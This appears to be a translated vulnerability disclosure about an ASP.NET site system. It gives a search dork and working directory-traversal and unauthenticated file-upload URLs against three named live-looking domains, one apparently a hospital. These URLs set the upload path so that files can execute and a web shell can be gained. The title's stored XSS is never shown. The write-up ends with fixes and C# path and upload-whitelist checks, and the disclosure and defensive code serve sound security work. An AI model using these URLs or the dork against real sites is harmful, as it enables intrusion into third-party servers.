Worry-free: stored XSS + getshell
Baidu keyword inurl: info. aspx? Code =
Arbitrary Directory Traversal
Http://www.312000.net/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin
Http://www.dyhospital.com/admin/dialog/FileList.aspx? Code = 0 & show = true & path = ./
Http://www.wlsph.com/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin/Dialog
Use the directory traversal vulnerability above to look for an available upload point.
After some tedious directory browsing ...
Eventually the upload page turns up: /admin/dialog/fileupload.aspx.
It seems that the default upload path does not allow execution.
So let's construct a path ourselves.
Http://www.312000.net/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog
Http://www.dyhospital.com/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog
Http://www.wlsph.com/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog
What if the uploaded file is renamed?
The previous directory traversal came in handy.
Using http://www.312000.net/ as an example:
In http://www.312000.net/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin/Dialog find the file (JavaScript must be disabled in the browser)
Visit
Http://www.312000.net/Admin/Dialog/201407301026743.txt
Solution:
Directory restrictions
Upload file whitelist
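
The two fixes above, sketched as server-side checks for an ASP.NET handler. This is an added example, not the vendor's code: UploadGuard, ResolveInsideRoot, NewUploadPath, the root directory and the extension set are all assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.IO;

// Added example; UploadGuard and its members are hypothetical names.
public static class UploadGuard
{
    // Upload whitelist (assumed set; adjust to what the site really needs).
    static readonly HashSet<string> Allowed = new HashSet<string>(
        StringComparer.OrdinalIgnoreCase) { ".jpg", ".png", ".gif", ".pdf" };

    static string WithSep(string p)
    {
        return p.TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;
    }

    // Directory restriction: canonicalise the request's "path" value and
    // refuse anything that resolves outside the configured root.
    public static string ResolveInsideRoot(string root, string requested)
    {
        string rootFull = WithSep(Path.GetFullPath(root));
        string full = Path.GetFullPath(Path.Combine(rootFull, requested ?? ""));
        if (!WithSep(full).StartsWith(rootFull, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("path escapes root");
        return full;
    }

    // Upload whitelist: the extension must be allowed, the stored name is
    // generated server-side, and the directory never comes from the request.
    public static string NewUploadPath(string uploadRoot, string clientName)
    {
        string ext = Path.GetExtension(clientName ?? "");
        if (!Allowed.Contains(ext))
            throw new InvalidOperationException("extension not allowed");
        string name = Guid.NewGuid().ToString("N") + ext.ToLowerInvariant();
        return Path.Combine(Path.GetFullPath(uploadRoot), name);
    }

    public static void Main()
    {
        string root = Path.Combine(Path.GetTempPath(), "site", "Upload"); // constructed
        Console.WriteLine(ResolveInsideRoot(root, "images/2014"));        // accepted
        Console.WriteLine(NewUploadPath(root, "photo.JPG"));              // accepted
        try { ResolveInsideRoot(root, "../Admin/Dialog"); }
        catch (UnauthorizedAccessException e) { Console.WriteLine(e.Message); }
        try { NewUploadPath(root, "page.aspx"); }
        catch (InvalidOperationException e) { Console.WriteLine(e.Message); }
    }
}
```

Because the target directory is fixed on the server, uploads stay in the default upload path, which per the write-up does not execute scripts. Both pages also sit under /admin/ and should require an authenticated session before any of these checks run.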